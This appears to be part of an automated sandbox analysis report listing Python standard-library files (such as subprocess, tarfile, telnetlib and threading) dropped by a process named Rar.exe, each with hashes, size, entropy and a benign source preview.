                                                                                                                                                                                      SSDEEP:6:UoPb5ThvOC3hvOuFimWA7la//1SITIFIjrWVZFIpdOv:UoDhECUno7YlSIEFIfWV7IpdA
                                                                                                                                                                                      MD5:5B6FAB07BA094054E76C7926315C12DB
                                                                                                                                                                                      SHA1:74C5B714160559E571A11EA74FEB520B38231BC9
                                                                                                                                                                                      SHA-256:EADBCC540C3B6496E52449E712ECA3694E31E1D935AF0F1E26CFF0E3CC370945
                                                                                                                                                                                      SHA-512:2846E8C449479B1C64D39117019609E5A6EA8030220CAC7B5EC6B4090C9AA7156ED5FCD5E54D7175A461CD0D58BA1655757049B0BCE404800BA70A2F1E12F78C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:__all__ = [.. # Functions.. 'calcsize', 'pack', 'pack_into', 'unpack', 'unpack_from',.. 'iter_unpack',.... # Classes.. 'Struct',.... # Exceptions.. 'error'.. ]....from _struct import *..from _struct import _clearcache..from _struct import __doc__..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):87039
                                                                                                                                                                                      Entropy (8bit):4.253206816074236
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:wx7t9c+p5IVwdFML1ikqz9lXochlqYI5a3pfZ5KL6Wv090Gj5h7qoHn7DZ0Mv2c4:wx7t++p5IVwdaL10mOw
                                                                                                                                                                                      MD5:AF21269C65819E2BECB701BD9AD0A113
                                                                                                                                                                                      SHA1:8176B2711C75E33782AB317BEECA21432D12C21A
                                                                                                                                                                                      SHA-256:863B6A9C34C5E7E0FF98693A86868B99C1D06156D3113393DB0620602166413D
                                                                                                                                                                                      SHA-512:70C108146CF6BC6233C3B05637B112EE158CC51E5156A6377682A5FAFAC836BEE74E09EC7EBC907CD0D6FEB1AA17B1D44BCFC427E8CD6387A488C4C4DBA5D8BC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# subprocess - Subprocesses with accessible I/O streams..#..# For more information about this module, see PEP 324...#..# Copyright (c) 2003-2005 by Peter Astrand <astrand@lysator.liu.se>..#..# Licensed to PSF under a Contributor Agreement.....r"""Subprocesses with accessible I/O streams....This module allows you to spawn processes, connect to their..input/output/error pipes, and obtain their return codes.....For a complete description of this module see the Python documentation.....Main API..========..run(...): Runs a command, waits for it to complete, then returns a.. CompletedProcess instance...Popen(...): A class for flexibly executing a command in a new process....Constants..---------..DEVNULL: Special value that indicates that os.devnull should be used..PIPE: Special value that indicates a pipe should be created..STDOUT: Special value that indicates that stderr should go to stdout......Older API..=========..call(...): Runs a command, waits for it to complete, then ret
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):18684
                                                                                                                                                                                      Entropy (8bit):4.553056496643947
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:xoVIiMydyelw/k/TyMRDdzlDGgGoBVb/yY/BFex0lAvl/yCyg+YdM0ccWeUPG:xojMUyey/UQloreY/exMAvoXWWK
                                                                                                                                                                                      MD5:9494A603999DDED928C7CE75204B4550
                                                                                                                                                                                      SHA1:67D6248D2265153FDF3AB20999D7955D7585DE2C
                                                                                                                                                                                      SHA-256:2471854C4EEE8C0FDC7E0AB7B2583CE9CBF0A22804EF3B4369DE1DD6623F4228
                                                                                                                                                                                      SHA-512:36279D7C7E0B85092333A3BB7C2843E4C593ED265536C5C87B9A777C1A34B6795B54B1657EB26541344A2BB736C78C1209B974D13959DC9C2311F00F7365940F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Stuff to parse Sun and NeXT audio files.....An audio file consists of a header followed by the data. The structure..of the header is as follows..... +---------------+.. | magic word |.. +---------------+.. | header size |.. +---------------+.. | data size |.. +---------------+.. | encoding |.. +---------------+.. | sample rate |.. +---------------+.. | # of channels |.. +---------------+.. | info |.. | |.. +---------------+....The magic word consists of the 4 characters '.snd'. Apart from the..info field, all header fields are 4 bytes in size. They are all..32-bit unsigned integers encoded in big-endian byte order.....The header size really gives the start of the data...The data size is the physical size of the data. From the other..parameters the number of frames can be calculated...The encoding gives the way in which audio sampl
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10539
                                                                                                                                                                                      Entropy (8bit):4.558490188936937
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:t+Ra9lq8SLJMqIQ6Eddu1Hgjo+SAKgepQ80:G78SLJ3IQ6E3cgKgepw
                                                                                                                                                                                      MD5:5E670049729E2B3C00DB6146DF365B42
                                                                                                                                                                                      SHA1:5F3C42EF566DFC4B298D1C6DE9BDA00D3A1C6CF9
                                                                                                                                                                                      SHA-256:771739EE612604D938FAF47967BCA20353E04A34537C7F70263336CEC035EC89
                                                                                                                                                                                      SHA-512:BFDE47732F4A7D3DF94D3F68C7B77EBF2E26DC41E8537969EE2F22F5FB09CB405BF5364E9C292CF43C54CF420723F62DA9A38FA4EDC2CEC5935FCE0AF91E4EFD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Interface to the compiler's internal symbol tables"""....import _symtable..from _symtable import (USE, DEF_GLOBAL, DEF_NONLOCAL, DEF_LOCAL, DEF_PARAM,.. DEF_IMPORT, DEF_BOUND, DEF_ANNOT, SCOPE_OFF, SCOPE_MASK, FREE,.. LOCAL, GLOBAL_IMPLICIT, GLOBAL_EXPLICIT, CELL)....import weakref....__all__ = ["symtable", "SymbolTable", "Class", "Function", "Symbol"]....def symtable(code, filename, compile_type):.. """ Return the toplevel *SymbolTable* for the source code..... *filename* is the name of the file with the code.. and *compile_type* is the *compile()* mode argument... """.. top = _symtable.symtable(code, filename, compile_type).. return _newSymbolTable(top, filename)....class SymbolTableFactory:.. def __init__(self):.. self.__memo = weakref.WeakValueDictionary().... def new(self, table, filename):.. if table.type == _symtable.TYPE_FUNCTION:.. return Function(table, filename).. if table.type == _symtable.TYPE_CLASS:..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):28412
                                                                                                                                                                                      Entropy (8bit):4.809738101386029
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:3Ez1dTpS7mmxofRw2GTUPbA+vRaPc35PdmOq61uc7g:3EzTmxofSevrPdTR7g
                                                                                                                                                                                      MD5:3C7466218544AA3B78754297FBE0A362
                                                                                                                                                                                      SHA1:879CFAAB401C08552198FAADF5E93A6D907CDAC3
                                                                                                                                                                                      SHA-256:BF6878D23532A73D8CCE030C9FFD27CE5606A7AB37F6CE0868D45078303A3D88
                                                                                                                                                                                      SHA-512:1C5AA6E5EA8B3C88EC3A96DD1025EECAB58A073A6170E36885D96127148694B8E49AE29282A0ADB96E9AED5D65C450917202E19E714325E28A3C1E89BF8FF74F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Access to Python's configuration information."""....import os..import sys..from os.path import pardir, realpath....__all__ = [.. 'get_config_h_filename',.. 'get_config_var',.. 'get_config_vars',.. 'get_makefile_filename',.. 'get_path',.. 'get_path_names',.. 'get_paths',.. 'get_platform',.. 'get_python_version',.. 'get_scheme_names',.. 'parse_config_h',..]....# Keys for get_config_var() that are never converted to Python integers..._ALWAYS_STR = {.. 'MACOSX_DEPLOYMENT_TARGET',..}...._INSTALL_SCHEMES = {.. 'posix_prefix': {.. 'stdlib': '{installed_base}/{platlibdir}/python{py_version_short}',.. 'platstdlib': '{platbase}/{platlibdir}/python{py_version_short}',.. 'purelib': '{base}/lib/python{py_version_short}/site-packages',.. 'platlib': '{platbase}/{platlibdir}/python{py_version_short}/site-packages',.. 'include':.. '{installed_base}/include/python{py_version_short}{abiflags}',.. 'platinclude':
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11630
                                                                                                                                                                                      Entropy (8bit):4.476146454696836
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:2Ptt0X5MiaVbSI5LmOLNzFhFI9NSHvc4n4+FAhBhNSkpyPqP1P+FMC6nMqx0:1X5M9lNBLNzFhFIjSHvc4n4+FAhFJ0Pn
                                                                                                                                                                                      MD5:D4EDAFFB57B5F7E6951E736CF97593C5
                                                                                                                                                                                      SHA1:41FFCFBF3E0EFBCC5B9F8F1036750EFE5935E532
                                                                                                                                                                                      SHA-256:2BC9219A65A25D5A5A9C602E34EB30E57AA92C0E1E5F88810B385B5671287563
                                                                                                                                                                                      SHA-512:21C2770812D98D0E6E0E28F867BBC304409AA7B56D4EA3F7B6B6795011AD38E9D31B685B6C148D0DC9D986E052E34F3D2E02D9A4E55AB27E728C3B6725D2CDC3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#! /usr/bin/env python3...."""The Tab Nanny despises ambiguous indentation. She knows no mercy.....tabnanny -- Detection of ambiguous indentation....For the time being this module is intended to be called as a script...However it is possible to import it into an IDE and use the function..check() described below.....Warning: The API provided by this module is likely to change in future..releases; such changes may not be backward compatible..."""....# Released to the public domain, by Tim Peters, 15 April 1998.....# XXX Note: this is now a standard library module...# XXX The API needs to undergo changes however; the current code is too..# XXX script-like. This will be addressed later.....__version__ = "6"....import os..import sys..import tokenize....__all__ = ["check", "NannyNag", "process_tokens"]....verbose = 0..filename_only = 0....def errprint(*args):.. sep = "".. for arg in args:.. sys.stderr.write(sep + str(arg)).. sep = " ".. sys.stderr.write("\n")....def
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):98505
                                                                                                                                                                                      Entropy (8bit):4.4936859498516855
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:AemBoIoCvKP1bdtZdRcPe4Z1PEJAsI28bVqMLsiz+eG+4:mBoIyP1ZtT2P4I28b7Lsizpp4
                                                                                                                                                                                      MD5:AFF6CDD5D1BF1F5D762722A8F2DE3682
                                                                                                                                                                                      SHA1:9240104EF5E5A3CAD532EDB48F5284888303C582
                                                                                                                                                                                      SHA-256:C64E0E9D426B82809A815277D43169CB1EEA2F9C95A954C9E5CDD666EC00783E
                                                                                                                                                                                      SHA-512:2A09F0103A1CAA6AB108F27411CC3689A691B2021F891BBB1F71219C41986799BEB90902C5E83F6DB0226497AD5B4C0DFDEEA919BC4BE3F3ACF342C4B3C3CCB7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#!/usr/bin/env python3..#-------------------------------------------------------------------..# tarfile.py..#-------------------------------------------------------------------..# Copyright (C) 2002 Lars Gustaebel <lars@gustaebel.de>..# All rights reserved...#..# Permission is hereby granted, free of charge, to any person..# obtaining a copy of this software and associated documentation..# files (the "Software"), to deal in the Software without..# restriction, including without limitation the rights to use,..# copy, modify, merge, publish, distribute, sublicense, and/or sell..# copies of the Software, and to permit persons to whom the..# Software is furnished to do so, subject to the following..# conditions:..#..# The above copyright notice and this permission notice shall be..# included in all copies or substantial portions of the Software...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDI
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):23931
                                                                                                                                                                                      Entropy (8bit):4.513930532086154
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:DyI08SF0rbykUKUIVl0RPB5Z9FrpvPsgeN9KOX2A4bVWVn:WASF0rukgI70RPB5Z9FrpvPsjN9Kw
                                                                                                                                                                                      MD5:EB3B08FCEA31D18D33A07BD207D58138
                                                                                                                                                                                      SHA1:F46BCA2B1F77A220229D678E0C134FE4E89BF0D7
                                                                                                                                                                                      SHA-256:25012B9A5584CB996866A80A7A94BAF9BDC7567213561648DE7CA47D9F82B5D5
                                                                                                                                                                                      SHA-512:4F673E37B236492F843384C693C8A37A13D8B72EEC107A9AD7218238A330B5824093D78E6A96B20952F2CE1F3F6939F311992D71095D7BBB8E47679199C6CCA9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:r"""TELNET client class.....Based on RFC 854: TELNET Protocol Specification, by J. Postel and..J. Reynolds....Example:....>>> from telnetlib import Telnet..>>> tn = Telnet('www.python.org', 79) # connect to finger port..>>> tn.write(b'guido\r\n')..>>> print(tn.read_all())..Login Name TTY Idle When Where..guido Guido van Rossum pts/2 <Dec 2 11:10> snag.cnri.reston......>>>....Note that read_all() won't read until eof -- it just reads some data..-- but it guarantees to read at least one byte unless EOF is hit.....It is possible to pass a Telnet object to a selector in order to wait until..more data is available. Note that in this case, read_eager() may return b''..even if there was data on the socket, because the protocol negotiation may have..eaten the data. This is why EOFError is needed in some cases to distinguish..between "no data" and "connection closed" (since the socket also appears ready..for reading when it is closed).....To
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):30059
                                                                                                                                                                                      Entropy (8bit):4.458883871447617
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:BNed/ue7EK/MBSxddEMDprcpdkddEJJS736fv1+N+l/zT:bed/uYE6M0xbEMDpopEuJJSefvkmT
                                                                                                                                                                                      MD5:ADF281376FF2C17FE5648DAB3FF70635
                                                                                                                                                                                      SHA1:9021298C6718C800AC40C08798DB4C5ECF254E93
                                                                                                                                                                                      SHA-256:068FE9CF767803038445D0907CAA1012B7BEBA34125A59E5DBA6D29C3EBE0FE1
                                                                                                                                                                                      SHA-512:98690E8B7E89ECEB5DC1DDAD07BF60B9BCD167D99545755E26AC8C12F0D01A023CBA2B20559C4D79CB16BFFACE0DA538D116AD219C83745FB6EA153E79A520A6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Temporary files.....This module provides generic, low- and high-level interfaces for..creating temporary files and directories. All of the interfaces..provided by this module can be used without fear of race conditions..except for 'mktemp'. 'mktemp' is subject to race conditions and..should not be used; it is provided for backward compatibility only.....The default path names are returned as str. If you supply bytes as..input, all return values will be in bytes. Ex:.... >>> tempfile.mkstemp().. (4, '/tmp/tmptpu9nin8').. >>> tempfile.mkdtemp(suffix=b'').. b'/tmp/tmppbi8f0hy'....This module also provides some data items to the user:.... TMP_MAX - maximum number of names that will be tried before.. giving up... tempdir - If this is set to a string before the first use of.. any routine from this module, it will be considered as.. another candidate location to store temporary files..."""....__all__ = [.. "NamedTemporaryFile", "Te
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):20266
                                                                                                                                                                                      Entropy (8bit):4.4470622302172105
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:6jYFj/VIYzSu/AdorlSNMNt/KhV0q1uJN7J6CJap:6jYFj/bDAdWFOUNcC0p
                                                                                                                                                                                      MD5:23A46648FFEC2BE524DEA36472771AFA
                                                                                                                                                                                      SHA1:68BFBEE2540F7937B9C46EC5CF00D25539151019
                                                                                                                                                                                      SHA-256:288D890D5440F4536EA74E75284C89931ECEF9D74D9033E8E9FA772C78789623
                                                                                                                                                                                      SHA-512:70D95896F89DFFD2895240E38B771D8AB615EAE956979AC17DC5F4DA17CBA1898D83B2FB01DC4408426C3D0B9188916BD1138B4D8111070851EA2743E857423E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Text wrapping and filling..."""....# Copyright (C) 1999-2001 Gregory P. Ward...# Copyright (C) 2002, 2003 Python Software Foundation...# Written by Greg Ward <gward@python.net>....import re....__all__ = ['TextWrapper', 'wrap', 'fill', 'dedent', 'indent', 'shorten']....# Hardcode the recognized whitespace characters to the US-ASCII..# whitespace characters. The main reason for doing this is that..# some Unicode spaces (like \u00a0) are non-breaking whitespaces..._whitespace = '\t\n\x0b\x0c\r '....class TextWrapper:.. """.. Object for wrapping/filling text. The public interface consists of.. the wrap() and fill() methods; the other methods are just there for.. subclasses to override in order to tweak the default behaviour... If you want to completely replace the main wrapping algorithm,.. you'll probably have to override _wrap_chunks()..... Several instance attributes control various aspects of wrapping:.. width (default: 70).. the maximum width of w
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1031
                                                                                                                                                                                      Entropy (8bit):4.7762509461988625
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:b9G79+7q737Kv7Vm7QXUJRfDDFWnLmjoOLSFDuCSy176Pff2fdgmsG0Fm:k79+7q737s7A7QXG93COWVB76HsdnsGx
                                                                                                                                                                                      MD5:92F4A7B0A22F593C8BDF429CAC3D4589
                                                                                                                                                                                      SHA1:958CCB19110A69ED6595B5F16C768CA73A85C469
                                                                                                                                                                                      SHA-256:5A89B1A1F22384960E69C554633A98558231F11A48260952EBFC21CA10F0625C
                                                                                                                                                                                      SHA-512:2E0A0118BE0F4B309E6286E8015FFE0885181A77B485BA39E528638757D59ADB2F15F9F2ACC04DE31794357556DD5CC622EC8D6526604CE6F3F8520C2B64D925
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:s = """Gur Mra bs Clguba, ol Gvz Crgref....Ornhgvshy vf orggre guna htyl...Rkcyvpvg vf orggre guna vzcyvpvg...Fvzcyr vf orggre guna pbzcyrk...Pbzcyrk vf orggre guna pbzcyvpngrq...Syng vf orggre guna arfgrq...Fcnefr vf orggre guna qrafr...Ernqnovyvgl pbhagf...Fcrpvny pnfrf nera'g fcrpvny rabhtu gb oernx gur ehyrf...Nygubhtu cenpgvpnyvgl orngf chevgl...Reebef fubhyq arire cnff fvyragyl...Hayrff rkcyvpvgyl fvyraprq...Va gur snpr bs nzovthvgl, ershfr gur grzcgngvba gb thrff...Gurer fubhyq or bar-- naq cersrenoyl bayl bar --boivbhf jnl gb qb vg...Nygubhtu gung jnl znl abg or boivbhf ng svefg hayrff lbh'er Qhgpu...Abj vf orggre guna arire...Nygubhtu arire vf bsgra orggre guna *evtug* abj...Vs gur vzcyrzragngvba vf uneq gb rkcynva, vg'f n onq vqrn...Vs gur vzcyrzragngvba vf rnfl gb rkcynva, vg znl or n tbbq vqrn...Anzrfcnprf ner bar ubaxvat terng vqrn -- yrg'f qb zber bs gubfr!"""....d = {}..for c in (65, 97):.. for i in range(26):.. d[chr(i+c)] = chr((i+13) % 26 + c)....print("".jo
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):58845
                                                                                                                                                                                      Entropy (8bit):4.40732639245589
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:2M81+KmC/gEGUXWyLOSpSI2gIk/fZtjinkKUd9aDJEi2OoOuTWJAkId6py5UwW9D:2bF6mf24RDKg9IEnO7IW+PdW97nX
                                                                                                                                                                                      MD5:E6E1AAD9071428279781BEAD7D1B474C
                                                                                                                                                                                      SHA1:A9850A2678A63E39CC3D60F0379A81F85CB7F0CA
                                                                                                                                                                                      SHA-256:40F8B3A0F8E8C44CC43627CE2D97416F2CCB4152D621ACC8F169C7B4D1427315
                                                                                                                                                                                      SHA-512:EADAD58B9322ECC59C45A580B37491355D1495F3FDFCA81192E0EE528ADC34CDCEFA5C5895EE5F7692C78FE7652D98F258F6C6D4B1C1EBD2DDBE924C110F1C48
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Thread module emulating a subset of Java's threading model."""....import os as _os..import sys as _sys..import _thread..import functools....from time import monotonic as _time..from _weakrefset import WeakSet..from itertools import islice as _islice, count as _count..try:.. from _collections import deque as _deque..except ImportError:.. from collections import deque as _deque....# Note regarding PEP 8 compliant names..# This threading model was originally inspired by Java, and inherited..# the convention of camelCase function and method names from that..# language. Those original names are not in any imminent danger of..# being deprecated (even for Py3k),so this module provides them as an..# alias for the PEP 8 compliant names..# Note that using the new PEP 8 compliant names facilitates substitution..# with the multiprocessing module, which doesn't provide the old..# Java inspired names.....__all__ = ['get_ident', 'active_count', 'Condition', 'current_thread',.. 'en
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13871
                                                                                                                                                                                      Entropy (8bit):4.371086714933462
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:NSkzurY2n/UbxSni/eR9ETCWxFXCfs+8YXIHKutPPTJJeXXqJ79UE/J6MWZVkgj2:cLWbxii/kc/fXcsrHKut3TKXX296NZVI
                                                                                                                                                                                      MD5:C6203F7BB9ECE6B3D3289A2E9BE08D6C
                                                                                                                                                                                      SHA1:DF6A867CD0FB08947ACFB3939BA815B0E48DAA6D
                                                                                                                                                                                      SHA-256:2632615C935A02D88636E5587955240CFD76D5DCCADC570719C3346E61D78182
                                                                                                                                                                                      SHA-512:6CB49B882E7AD272C2AD0F852CDFEA0E01D458FBCCEAC1C279BA7D036F614B781C1607C49A788D635B92734B103D28446FA51E3E3A8CF4734BE06325F8DF59F7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#! /usr/bin/env python3...."""Tool for measuring execution time of small code snippets.....This module avoids a number of common traps for measuring execution..times. See also Tim Peters' introduction to the Algorithms chapter in..the Python Cookbook, published by O'Reilly.....Library usage: see the Timer class.....Command line usage:.. python timeit.py [-n N] [-r N] [-s S] [-p] [-h] [--] [statement]....Options:.. -n/--number N: how many times to execute 'statement' (default: see below).. -r/--repeat N: how many times to repeat the timer (default 5).. -s/--setup S: statement to be executed once initially (default 'pass')... Execution time of this setup statement is NOT timed... -p/--process: use time.process_time() (default is time.perf_counter()).. -v/--verbose: print raw timing results; repeat for more digits precision.. -u/--unit: set the output time unit (nsec, usec, msec, or sec).. -h/--help: print this usage message and exit.. --: separate options from
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2523
                                                                                                                                                                                      Entropy (8bit):5.200512889670289
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:JlLcdqen2WIMekwDqkJVZuR4APJ4BUhCla9frYqR6FCgLzqUVndcELod:Tc/2xMeJJIhOGhsa9zgvzqUVn+Ew
                                                                                                                                                                                      MD5:AA65A2487B85B91AB92597D0AB01B3DB
                                                                                                                                                                                      SHA1:EFAB12AABDF40AE7C127678A4E398A0D8D7333C7
                                                                                                                                                                                      SHA-256:DEEF9E816F02D761501BB6E28870B204E2341D39D3D5D0131F5853781CBF2C0E
                                                                                                                                                                                      SHA-512:107CBAFEE254F31530768507318616CC177F014E84D4AC37280E5054AF94E70BCC3D578EBB608FCBBFE91211B8E6F4B5CC13C6E470736916101B2607912AB6DB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Token constants."""..# Auto-generated by Tools/scripts/generate_token.py....__all__ = ['tok_name', 'ISTERMINAL', 'ISNONTERMINAL', 'ISEOF']....ENDMARKER = 0..NAME = 1..NUMBER = 2..STRING = 3..NEWLINE = 4..INDENT = 5..DEDENT = 6..LPAR = 7..RPAR = 8..LSQB = 9..RSQB = 10..COLON = 11..COMMA = 12..SEMI = 13..PLUS = 14..MINUS = 15..STAR = 16..SLASH = 17..VBAR = 18..AMPER = 19..LESS = 20..GREATER = 21..EQUAL = 22..DOT = 23..PERCENT = 24..LBRACE = 25..RBRACE = 26..EQEQUAL = 27..NOTEQUAL = 28..LESSEQUAL = 29..GREATEREQUAL = 30..TILDE = 31..CIRCUMFLEX = 32..LEFTSHIFT = 33..RIGHTSHIFT = 34..DOUBLESTAR = 35..PLUSEQUAL = 36..MINEQUAL = 37..STAREQUAL = 38..SLASHEQUAL = 39..PERCENTEQUAL = 40..AMPEREQUAL = 41..VBAREQUAL = 42..CIRCUMFLEXEQUAL = 43..LEFTSHIFTEQUAL = 44..RIGHTSHIFTEQUAL = 45..DOUBLESTAREQUAL = 46..DOUBLESLASH = 47..DOUBLESLASHEQUAL = 48..AT = 49..ATEQUAL = 50..RARROW = 51..ELLIPSIS = 52..COLONEQUAL = 53..OP = 54..AWAIT = 55..ASYNC = 56..TYPE_IGNORE = 57..TYPE_COMMENT = 58..SOFT_KEYWORD
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):26605
                                                                                                                                                                                      Entropy (8bit):4.4796819072543625
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:gk38juhVciXCBRFY0VbUu/5Y2RGwrHfxGN8vlyk8fkRC:g8hVciXuRF2UGwrHINglykPRC
                                                                                                                                                                                      MD5:A17093EC72AAEA5AC4577A66AA08A854
                                                                                                                                                                                      SHA1:426A82CFAD92FF74C773A402A04E5F2E62E7DFAA
                                                                                                                                                                                      SHA-256:2358675675BEB7A085FB97A7470B7E96327DFA8DE25BA49C5E5B4153197A4086
                                                                                                                                                                                      SHA-512:5B81E97E8EC85A59C1F95148030DD1754C8E6D80FE794D895A05F47CA63961E49FA7074DCA85EBE79FE813467676C58DC7D428FFF19DF8ECE321ACC9E9CE28DE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Tokenization help for Python programs.....tokenize(readline) is a generator that breaks a stream of bytes into..Python tokens. It decodes the bytes according to PEP-0263 for..determining source file encoding.....It accepts a readline-like method which is called repeatedly to get the..next line of input (or b"" for EOF). It generates 5-tuples with these..members:.... the token type (see token.py).. the token (a string).. the starting (row, column) indices of the token (a 2-tuple of ints).. the ending (row, column) indices of the token (a 2-tuple of ints).. the original line (string)....It is designed to match the working of the Python tokenizer exactly, except..that it produces COMMENT tokens for comments and gives type OP for all..operators. Additionally, all token lists start with an ENCODING token..which tells you which encoding was used to decode the bytes stream..."""....__author__ = 'Ka-Ping Yee <ping@lfw.org>'..__credits__ = ('GvR, ESR, Tim Peters, Thomas Wou
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):29943
                                                                                                                                                                                      Entropy (8bit):4.347507846378227
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:s8ANL0a9ZzFP5mpE+y0161HRlT9Lx+Mdbud3:biL0aJYp5yVtfud3
                                                                                                                                                                                      MD5:44BAC37B405DD10CBEFE06F87249CDEF
